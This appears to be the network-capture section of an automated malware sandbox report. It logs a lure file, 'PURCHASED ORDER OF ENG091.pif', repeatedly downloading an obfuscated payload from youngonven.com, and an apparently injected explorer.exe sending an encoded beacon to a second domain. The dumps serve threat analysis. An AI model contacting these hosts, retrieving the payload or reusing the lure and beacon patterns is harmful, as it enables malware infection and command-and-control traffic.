Oct 8, 2024 11:30:36.603651047 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:30:36.603665113 CEST	1236	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
Oct 8, 2024 11:30:36.603679895 CEST	1236	IN	Data Raw: e6 0d ea 06 e7 d5 0c d8 d4 e2 cf 0e 0e 12 dd fb fb 45 f5 47 48 41 fb ee 44 46 ed f2 f1 41 3d 3c 36 3b 38 3b 3c 06 3a 30 31 2f 2d e8 03 f3 f3 8f 97 91 97 98 96 67 66 67 60 61 91 91 62 69 5e a9 55 57 59 56 a9 56 a5 a1 50 53 a4 9d a2 a3 53 8a bc 8a Data Ascii: EGHADFA=<6;8;<:01/-gfg`abi^UWYVVPSS}vv\|uut{wrrrpTNMea^_{\|ptqtpA<!59::-.LFHELHC%
Oct 8, 2024 11:30:36.603694916 CEST	1120	IN	Data Raw: 2a 36 4b 3a 43 3f 2f 30 41 32 ff 48 ef 46 48 f6 4a 4a f7 ef 3f f4 41 ef 3f f4 ee 2c 27 27 d5 27 d6 25 29 1d 22 cf 24 cd cf 2a 03 ec e9 e4 e9 2b f7 02 e5 dd 10 e3 11 e4 14 0e 12 46 fc f7 f5 48 4b 4c 42 f3 ed f0 41 42 f3 44 3f 05 36 2d 0a 34 34 37 Data Ascii: 6K:C?/0A2HFHJJ?A?,'''%)"$+FHKLBABD?6-4475/.g]]ibbYZZ\TSXNTMTQ}~~z\|u{\|sxwwppyZW\TNRRkkhf{mqo,)'
Oct 8, 2024 11:30:36.603708982 CEST	1236	IN	Data Raw: 67 97 62 93 62 64 91 60 6b 5e 63 56 a5 5b 58 55 56 57 a8 58 a4 a3 51 9d 52 4f 53 80 b5 7e ba bc b6 b7 b9 81 7d b1 81 af af 84 89 6f cb 27 05 73 c7 c7 71 c3 c3 be 75 bf c3 70 71 5b a7 9d 5c 57 59 a8 a8 9d 53 a5 a1 a1 ab a2 a9 9a 98 9c 97 9a 67 91 Data Ascii: gbbd`k^cV[XUVWXQROS~}o'squpq[\WYSge]d^uyqq,',!";602KEGGB@?'*#,&"#""GIFLDLC>?KJC71;
Oct 8, 2024 11:30:36.603724003 CEST	1236	IN	Data Raw: df cd e5 25 df e6 e9 0b 0c fa 08 2d f3 f0 fc 44 ed 44 ed 4c 3e f3 3d 06 0b 09 39 3c 07 07 31 37 33 2d 01 3c 2f 3a 06 98 a5 a9 6b 9c 63 96 62 91 5f 65 a2 9f 98 8f 63 a5 55 59 4d 5c 5c 5b ab 53 a4 4e a4 5b 50 51 5a 8b ba b7 7d b8 b7 8a 89 84 7d 7e Data Ascii: %-DDL>=9<173-</:kcb_ecUYM\\[SN[PQZ}}~}vmzv{zqpmppPliYi[Slfgf]a`l]yzttnoo+,(!%+" ;;<-0-3KHLEFK==?C +',"'&!
Oct 8, 2024 11:30:36.603739023 CEST	1236	IN	Data Raw: 2e 2f 30 fa 46 49 fa fa 48 f8 fa 3e f8 ef ee f4 f2 f4 ee 2c 2a 2c 1e 24 11 0e 10 d4 f3 d1 1f 23 2c 1f d3 e8 16 ea ea 15 1a 15 15 10 e4 0e 13 dd 0f 10 de fb 4c 46 4b f8 43 4a 42 40 3d 3f f0 f2 4b 3e 40 39 0a 45 1d 21 1f 3c 37 04 33 02 ff 01 33 04 Data Ascii: ./0FIH>,*,$#,LFKCJB@=?K>@9E!<733-_]kik]ad^b[W[T\XST~}{pnz\|urqXihTNXRQQTeljg_Od{\|zo;(C ","(+ !
Oct 8, 2024 11:30:36.603754997 CEST	1236	IN	Data Raw: e7 de e6 e3 ea e8 e8 df e2 e5 14 e2 12 dd e2 2b 27 ce 29 d7 26 dc 2c d2 cd d6 d3 1d 1f 27 11 4c 3b 4a 39 37 fc 44 0a 4c 02 06 ff 03 2f 2d 04 f5 47 f6 f8 49 47 f1 f5 ed f0 f4 ef 42 fb f2 f2 d6 06 fa f7 05 1c e4 2a ec d3 1f 1d 1d 20 1d d3 1b 19 1b Data Ascii: +')&,'L;J97DL/-GIGB* ?JJECLE=@D;5:;:73131-1jlhfh^]c`YW[WMOTP~}wwzvqnnoY[QROOQOjjilccad_c^zut
Oct 8, 2024 11:30:36.608711958 CEST	1236	IN	Data Raw: 68 59 92 93 5e 91 93 8f 8d 94 92 c6 77 76 78 cb c9 c7 c1 c8 bf c6 71 72 cc bd 55 58 5c 59 ae 8a bb b9 bc b1 b8 b5 7f 82 af 7d 7d e9 1b 18 e6 e6 ec 15 eb e7 e8 e2 e6 e2 e0 0f df d5 da 2b 27 28 28 d1 d1 23 d4 d2 cf 1d d4 1d d4 3c 07 09 0c 0a 0b 3c Data Ascii: hY^wvxqrUX\Y}}+'((#<<54HK=B?)'#(*&,$JEJKA@CDA=9/6/3-gg``^`VPWVNSPT}yts\|tvVil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49882	192.243.59.20	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:30:44.417327881 CEST	186	OUT	GET /btrd/?8pn=ChvLWF0pZdjL9&orD=G5lr6//zQ7aMiplq1GdUNb9GEJVmzQOhD2w3hHYWxcuiBbLjkdh8uX+W8X62ffIzaE+7zSgsRw== HTTP/1.1 Host: www.emeraldsurrogatefabric.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 8, 2024 11:30:44.881741047 CEST	590	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.19.5 Date: Tue, 08 Oct 2024 09:30:44 GMT Content-Type: text/html Content-Length: 169 Connection: close Location: https://google.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: 8788fc87894c5cb81bad778d734b5c62 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.5</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49903	63.250.38.167	80	3924	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:30:48.022135973 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:30:48.611979961 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:30:48 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:30:48.611993074 CEST	224	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&'
Oct 8, 2024 11:30:48.612010956 CEST	1236	IN	Data Raw: 29 e3 2b 06 1d e9 1f d7 21 06 23 48 f5 49 f7 2f fa 34 fc 28 ed 39 f0 17 f2 2c f4 0d 05 4c 07 33 09 2f 0b 32 fd 4b 00 16 02 4c 03 25 d5 1f d7 20 d9 0d db 37 cd 2a d0 40 d1 1e d4 4c e6 3d b8 88 b5 b9 bc 80 7f b1 b2 b1 af b4 80 16 eb 19 17 e8 e4 e8 Data Ascii: )+!#HI/4(9,L3/2KL% 7*@L=((!<6/-01^ZPr]Rvxz\|nprs~VWZ\MPQTegil]_bd689;.024FHIL=?[NY
Oct 8, 2024 11:30:48.612040997 CEST	1236	IN	Data Raw: 5d 92 66 6b 90 62 94 5b aa 58 57 58 56 51 cb 55 bc ad 90 a6 9d 93 a1 b4 78 9b ad af b7 cc 9e a2 b3 af c0 b6 b5 bd a6 9a 96 98 a5 7d c7 b1 c5 6d bf c3 74 7b c1 c3 70 5b 5a 56 9e aa aa 5a a6 6e a6 89 7e 61 55 50 64 68 63 a5 8c 64 60 66 5b 7b 74 4f Data Ascii: ]fkb[XWXVQUx}mt{p[ZVZn~aUPdhcd`f[{tOae`pusn%'J-:)$$'@04:GB*B.8K"=J:@H@?>?#L=GAHEAI=fhjl^`
Oct 8, 2024 11:30:48.612057924 CEST	1236	IN	Data Raw: e0 0e e1 48 4c 47 4a 45 43 42 ef f3 fd f0 ed f5 ff fa f1 0c 2f 0a 05 37 0a 39 35 37 38 2f fd 30 34 2f 01 95 6a 96 9a 99 9a 9a 9c 93 8f 94 91 95 a0 93 62 ab ab ab a8 a5 ab aa 51 53 57 4f 55 4d 51 a2 a4 b8 b5 8a 86 8b 87 89 81 b0 b4 84 b0 7f 8c 83 Data Ascii: HLGJECB/79578/04/jbQSWOUMQ{w\|zpsqmy\ZWOSkhh]]baxmr~}("<575.GFLFA?D@%((
Oct 8, 2024 11:30:48.612080097 CEST	1236	IN	Data Raw: 46 48 45 f9 f7 4c 48 ef f8 f0 f6 f3 f3 43 f2 dc 25 1d dc 26 d7 d7 28 23 1e 21 1d 20 d1 1e d3 1c 10 e9 15 16 14 18 19 0d 0d de 15 1b de df 14 49 46 3d f5 47 fa 4a 4a f4 ce f9 fb f2 f9 d4 f7 f7 ef 37 3b 38 3a 0b 31 01 34 31 31 ff 00 fd 32 5f 68 5d Data Ascii: FHELHC%&(#! IF=GJJ7;8:14112_h]kjiaa]`dciP\XVVRSq}~\|ywxtrtwvmrnXWUSQfgf`^upnos~T%H,,*)"$!66
Oct 8, 2024 11:30:48.612096071 CEST	896	IN	Data Raw: e8 17 eb e8 dd 12 12 e2 ec dd e2 d9 2c 29 27 da d3 da d2 d8 d8 d0 22 22 cf d3 d0 3b 3b 3a 09 06 03 37 01 fd 2e 31 32 32 fd 2e 30 f0 fa ed fc f5 f7 4b 2b 4a 4c 4c 30 03 14 42 46 dc ec e9 d9 2a 2c db 25 cd cf 1f d2 d0 22 cf 29 15 e7 15 0d 14 13 e7 Data Ascii: ,)'"";;:7.122.0K+JLL0BF*,%")KECIA>>CH5-3/;2ifkflegc`dk`YXTRUQTMwwnvxtv[QTQwlh]_`{\|zstmrm
Oct 8, 2024 11:30:48.612114906 CEST	1236	IN	Data Raw: 67 97 62 93 62 64 91 60 6b 5e 63 56 a5 5b 58 55 56 57 a8 58 a4 a3 51 9d 52 4f 53 80 b5 7e ba bc b6 b7 b9 81 7d b1 81 af af 84 89 6f cb 27 05 73 c7 c7 71 c3 c3 be 75 bf c3 70 71 5b a7 9d 5c 57 59 a8 a8 9d 53 a5 a1 a1 ab a2 a9 9a 98 9c 97 9a 67 91 Data Ascii: gbbd`k^cV[XUVWXQROS~}o'squpq[\WYSge]d^uyqq,',!";602KEGGB@?'*#,&"#""GIFLDLC>?KJC71;
Oct 8, 2024 11:30:48.612128973 CEST	1236	IN	Data Raw: df cd e5 25 df e6 e9 0b 0c fa 08 2d f3 f0 fc 44 ed 44 ed 4c 3e f3 3d 06 0b 09 39 3c 07 07 31 37 33 2d 01 3c 2f 3a 06 98 a5 a9 6b 9c 63 96 62 91 5f 65 a2 9f 98 8f 63 a5 55 59 4d 5c 5c 5b ab 53 a4 4e a4 5b 50 51 5a 8b ba b7 7d b8 b7 8a 89 84 7d 7e Data Ascii: %-DDL>=9<173-</:kcb_ecUYM\\[SN[PQZ}}~}vmzv{zqpmppPliYi[Slfgf]a`l]yzttnoo+,(!%+" ;;<-0-3KHLEFK==?C +',"'&!
Oct 8, 2024 11:30:48.612153053 CEST	1236	IN	Data Raw: 2e 2f 30 fa 46 49 fa fa 48 f8 fa 3e f8 ef ee f4 f2 f4 ee 2c 2a 2c 1e 24 11 0e 10 d4 f3 d1 1f 23 2c 1f d3 e8 16 ea ea 15 1a 15 15 10 e4 0e 13 dd 0f 10 de fb 4c 46 4b f8 43 4a 42 40 3d 3f f0 f2 4b 3e 40 39 0a 45 1d 21 1f 3c 37 04 33 02 ff 01 33 04 Data Ascii: ./0FIH>,*,$#,LFKCJB@=?K>@9E!<733-_]kik]ad^b[W[T\XST~}{pnz\|urqXihTNXRQQTeljg_Od{\|zo;(C ","(+ !
Oct 8, 2024 11:30:48.617151976 CEST	1236	IN	Data Raw: e7 de e6 e3 ea e8 e8 df e2 e5 14 e2 12 dd e2 2b 27 ce 29 d7 26 dc 2c d2 cd d6 d3 1d 1f 27 11 4c 3b 4a 39 37 fc 44 0a 4c 02 06 ff 03 2f 2d 04 f5 47 f6 f8 49 47 f1 f5 ed f0 f4 ef 42 fb f2 f2 d6 06 fa f7 05 1c e4 2a ec d3 1f 1d 1d 20 1d d3 1b 19 1b Data Ascii: +')&,'L;J97DL/-GIGB* ?JJECLE=@D;5:;:73131-1jlhfh^]c`YW[WMOTP~}wwzvqnnoY[QROOQOjjilccad_c^zut

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49950	63.250.38.167	80	5128	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:30:56.629498005 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:30:57.223357916 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:30:57 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:30:57.223376989 CEST	224	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&'
Oct 8, 2024 11:30:57.223392010 CEST	1236	IN	Data Raw: 29 e3 2b 06 1d e9 1f d7 21 06 23 48 f5 49 f7 2f fa 34 fc 28 ed 39 f0 17 f2 2c f4 0d 05 4c 07 33 09 2f 0b 32 fd 4b 00 16 02 4c 03 25 d5 1f d7 20 d9 0d db 37 cd 2a d0 40 d1 1e d4 4c e6 3d b8 88 b5 b9 bc 80 7f b1 b2 b1 af b4 80 16 eb 19 17 e8 e4 e8 Data Ascii: )+!#HI/4(9,L3/2KL% 7*@L=((!<6/-01^ZPr]Rvxz\|nprs~VWZ\MPQTegil]_bd689;.024FHIL=?[NY
Oct 8, 2024 11:30:57.223440886 CEST	1236	IN	Data Raw: 5d 92 66 6b 90 62 94 5b aa 58 57 58 56 51 cb 55 bc ad 90 a6 9d 93 a1 b4 78 9b ad af b7 cc 9e a2 b3 af c0 b6 b5 bd a6 9a 96 98 a5 7d c7 b1 c5 6d bf c3 74 7b c1 c3 70 5b 5a 56 9e aa aa 5a a6 6e a6 89 7e 61 55 50 64 68 63 a5 8c 64 60 66 5b 7b 74 4f Data Ascii: ]fkb[XWXVQUx}mt{p[ZVZn~aUPdhcd`f[{tOae`pusn%'J-:)$$'@04:GB*B.8K"=J:@H@?>?#L=GAHEAI=fhjl^`
Oct 8, 2024 11:30:57.223452091 CEST	1236	IN	Data Raw: e0 0e e1 48 4c 47 4a 45 43 42 ef f3 fd f0 ed f5 ff fa f1 0c 2f 0a 05 37 0a 39 35 37 38 2f fd 30 34 2f 01 95 6a 96 9a 99 9a 9a 9c 93 8f 94 91 95 a0 93 62 ab ab ab a8 a5 ab aa 51 53 57 4f 55 4d 51 a2 a4 b8 b5 8a 86 8b 87 89 81 b0 b4 84 b0 7f 8c 83 Data Ascii: HLGJECB/79578/04/jbQSWOUMQ{w\|zpsqmy\ZWOSkhh]]baxmr~}("<575.GFLFA?D@%((
Oct 8, 2024 11:30:57.223464966 CEST	672	IN	Data Raw: 46 48 45 f9 f7 4c 48 ef f8 f0 f6 f3 f3 43 f2 dc 25 1d dc 26 d7 d7 28 23 1e 21 1d 20 d1 1e d3 1c 10 e9 15 16 14 18 19 0d 0d de 15 1b de df 14 49 46 3d f5 47 fa 4a 4a f4 ce f9 fb f2 f9 d4 f7 f7 ef 37 3b 38 3a 0b 31 01 34 31 31 ff 00 fd 32 5f 68 5d Data Ascii: FHELHC%&(#! IF=GJJ7;8:14112_h]kjiaa]`dciP\XVVRSq}~\|ywxtrtwvmrnXWUSQfgf`^upnos~T%H,,*)"$!66
Oct 8, 2024 11:30:57.223551989 CEST	1236	IN	Data Raw: 8f 99 99 98 9a 9a 9c 98 63 95 60 90 9b 99 63 cb bf c8 7a c4 76 c6 c6 c7 c4 bd 72 72 c0 be be b5 86 b6 88 b6 88 8b 86 7d af 80 b0 b4 ae 5c 7b e7 e8 e5 e8 ec e8 3a ea dc e0 dd de e3 d7 e1 e2 d7 d8 e2 47 db dc d9 dd cf d0 cd ce d3 d4 d1 d2 07 08 09 Data Ascii: c`czvrr}\{:G@><>#?6D.KA/IG.4&5=,+JKKFLDBC978;4343133khaecekbiPYMYTUWTTRMNQ~xoprtY
Oct 8, 2024 11:30:57.223560095 CEST	224	IN	Data Raw: b6 85 87 7f af 85 b1 82 83 81 b1 c5 ca c6 77 76 cb c5 71 73 74 c3 bd 70 6d c4 74 ab 9f a7 ac 57 a8 a9 59 51 9e 4f a2 a3 52 9f 9f 65 66 8e 9c 6c 69 95 65 60 5e 91 62 61 63 5d 9a 79 c8 cb 75 c8 c5 cb 79 71 bd 6f c6 74 c2 ca c2 ba 8a ae bc bc bc 8b Data Ascii: wvqstpmtWYQOReflie`^bac]yuyqot+&%%" <6..4EFIIGID@B+$((""!JHFJJGF=0<4.36--/jijh
Oct 8, 2024 11:30:57.223576069 CEST	1236	IN	Data Raw: 67 97 62 93 62 64 91 60 6b 5e 63 56 a5 5b 58 55 56 57 a8 58 a4 a3 51 9d 52 4f 53 80 b5 7e ba bc b6 b7 b9 81 7d b1 81 af af 84 89 6f cb 27 05 73 c7 c7 71 c3 c3 be 75 bf c3 70 71 5b a7 9d 5c 57 59 a8 a8 9d 53 a5 a1 a1 ab a2 a9 9a 98 9c 97 9a 67 91 Data Ascii: gbbd`k^cV[XUVWXQROS~}o'squpq[\WYSge]d^uyqq,',!";602KEGGB@?'*#,&"#""GIFLDLC>?KJC71;
Oct 8, 2024 11:30:57.223587036 CEST	1236	IN	Data Raw: df cd e5 25 df e6 e9 0b 0c fa 08 2d f3 f0 fc 44 ed 44 ed 4c 3e f3 3d 06 0b 09 39 3c 07 07 31 37 33 2d 01 3c 2f 3a 06 98 a5 a9 6b 9c 63 96 62 91 5f 65 a2 9f 98 8f 63 a5 55 59 4d 5c 5c 5b ab 53 a4 4e a4 5b 50 51 5a 8b ba b7 7d b8 b7 8a 89 84 7d 7e Data Ascii: %-DDL>=9<173-</:kcb_ecUYM\\[SN[PQZ}}~}vmzv{zqpmppPliYi[Slfgf]a`l]yzttnoo+,(!%+" ;;<-0-3KHLEFK==?C +',"'&!
Oct 8, 2024 11:30:57.228411913 CEST	1236	IN	Data Raw: 2e 2f 30 fa 46 49 fa fa 48 f8 fa 3e f8 ef ee f4 f2 f4 ee 2c 2a 2c 1e 24 11 0e 10 d4 f3 d1 1f 23 2c 1f d3 e8 16 ea ea 15 1a 15 15 10 e4 0e 13 dd 0f 10 de fb 4c 46 4b f8 43 4a 42 40 3d 3f f0 f2 4b 3e 40 39 0a 45 1d 21 1f 3c 37 04 33 02 ff 01 33 04 Data Ascii: ./0FIH>,*,$#,LFKCJB@=?K>@9E!<733-_]kik]ad^b[W[T\XST~}{pnz\|urqXihTNXRQQTeljg_Od{\|zo;(C ","(+ !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49991	63.250.38.167	80	2264	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:31:04.287281036 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:31:04.898621082 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:31:04 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:31:04.898677111 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:31:04.898715973 CEST	448	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
